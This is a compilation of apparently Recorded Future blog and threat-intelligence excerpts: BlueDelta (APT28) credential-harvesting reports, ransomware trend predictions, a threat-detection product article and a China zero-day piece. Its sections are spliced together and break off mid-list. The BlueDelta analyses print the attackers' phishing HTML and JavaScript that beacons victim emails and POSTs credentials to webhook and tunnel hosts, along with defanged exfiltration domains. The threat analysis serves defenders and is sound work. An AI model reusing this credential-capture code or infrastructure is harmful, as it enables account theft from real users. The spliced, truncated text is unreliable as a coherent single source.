The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”

Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.

Looking to the future of threat intelligence

When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.

Watch the recordings of the North America and EMEA webinar sessions to learn more, and download the 2025 State of Threat Intelligence Report to see how your peers are evaluating, investing in, and operationalizing threat intelligence.

Executive Summary

Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.

Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.

BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.

BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.

Key Findings

• BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
• The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
• Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
• BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
• Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.

Microsoft OWA Credential Harvesting

On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.

Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)

BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.

The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.

<html>
  <head>
    <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width">
        <meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4">
  </head>
  <body>
    <object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"></object>
  </body>
</html>

Figure 2: HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)

The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”

Figure 3: Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)

After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.

As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.

Figure 4: Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)

<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>

Figure 5: JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)

The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.

When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.

• Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
• Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
• Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.

The ransomware paradox: More attacks, less money

By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.

For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.

This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.

Trend 1: DDoS services return to the RaaS model

With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.

The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.

• What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.

Trend 2: Insider recruitment attempts are accelerating

Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.

The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.

• What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.

Trend 3: Gig workers as unwitting attack vectors

According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.

The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.

• What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.

Looking ahead: One big prediction for 2026

The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.

Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.

The bottom line: Strengthen your ransomware defenses

Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:

• Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
• Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
• Download the Proactive Ransomware Mitigation eBook for actionable strategies to identify, investigate, and prioritize cyber threats.

• Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
• Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
• Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
• Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
• Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.

Why Digital Threat Detection Requires a New Approach

Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:

• High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
• Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
• Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
• Alert fatigue from manually sifting through noise to find high-risk signals.

As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.

Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.

The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.

Understanding the Modern Digital Threat Landscape

To build an effective digital threat detection program, security teams must understand where modern threats originate and how attackers operate.

Key Threat Vectors Beyond the Perimeter

Leaked credentials and account takeover attempts (stolen identities)

Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.

Brand impersonation, domain spoofing, and phishing campaigns

Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.

Vulnerability exploitation and zero-day threats in the external attack surface

Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.

Dark web chatter and early warning signs of planned ransomware or DDoS attacks

Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.

Why an Intelligence-Driven Approach is Better

For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.

Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.

The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.

Essential Digital Threat Detection Tools and Technologies

Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.

Threat Intelligence Platforms: The Engines of Context

No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.

Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:

• Open web reporting
• Underground forums
• Dark web marketplaces
• Malware sandboxes
• Threat feeds
• Researcher data

Once the data is normalized, the platform enriches it with context, such as:

• Relationships between indicators
• Associations with known threat actors
• Infrastructure reuse
• Activity targeting specific industries or regions

This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.

Security Orchestration, Automation, and Response (SOAR)

While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.

Key SOAR capabilities include:

• Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
• Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
• Initiating takedown workflows for harmful domains or impersonation infrastructure
• Coordinating actions across multiple security tools to ensure a unified response
• Documenting each step of the investigation for reporting and compliance

By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.

Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration

EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.

EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.

Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.

Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.

Overcoming the Analyst’s Biggest Pain Points

Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.

The Drain of Alert Fatigue and False Positives

High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.

The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.

The Blind Spots of External Risk

Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.

These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.

Recorded Future: Operationalizing Digital Threat Intelligence at Scale

Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.

Real-Time Context from the Intelligence GraphⓇ

The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:

• Open web
• Dark web marketplaces
• Malware repositories
• Technical feeds
• Network telemetry
• Closed underground forums

No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.

Comprehensive Digital Risk Protection for External Threats

Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.

Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.

Accelerating Time-to-Action through Integrated Intelligence

Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.

An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.

Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.

This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.

Smarter, Faster Security Decisions

Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.

By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.

These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.

Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.

Executive Summary

Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.

Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.

BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.

Key Findings

• BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
• The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
• BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
• Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
• The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.

Figure 1: The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)

The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as per Figure 2.

Figure 2: UKR.NET credential capture page JavaScript (Source: Recorded Future)

The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.

At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.

The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.

BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.

var respIP=$.getJSON('hxxps://httpbin[.]org/ip');

Figure 3: Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)

Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.

On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.

The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.

In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.

Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.

On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.

Figure 4: JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)

Figure 5: JavaScript code used to capture credentials (Source: Recorded Future)

During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.

Figure 6: PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages

(Source: Recorded Future)

Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:

• doads[.]org
• in[.]run
• t[.]ly
• tiny[.]cc
• tinyurl[.]com
• linkcuts[.]com

In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:

• China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, signaling a continued effort toward stockpiling exploits for strategic or military advantage.
• The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) give the Chinese state first access and control over zero-days. Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.
• The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s consolidation of cyber capabilities, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.
• Defenders should adopt an “assume breach” posture and build for containment, implementing zero trust and layered defenses to limit attacker movement and impact after an exploit.

Figure 1: How China stockpiles vulnerabilities (Source: Recorded Future)

Analysis

Zero-Days as Strategic Weapons

A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.

Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the Vulnerabilities Equities Process (VEP), which is designed to be transparent and generally favors disclosure to help maintain internet security.

China’s Vulnerability Management Regime

China’s vulnerability management system is centralized and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.

• Mandatory Reporting

The RMSV (2021) requires that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The Data Security Law (DSL) and National Intelligence Law (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.

• Incentivizing Compliance

This legal framework is reinforced through financial and professional incentives. The China National Vulnerability Database of Information Security (CNNVD), managed by the Ministry of State Security (MSS), offers researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.

• Talent Development and Recruitment Pipelines

China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s $2.75 million USD prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.

• Private Sector Relationships
  
  China’s private sector also plays a pivotal role. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The i-SOON leaks (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.

From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline

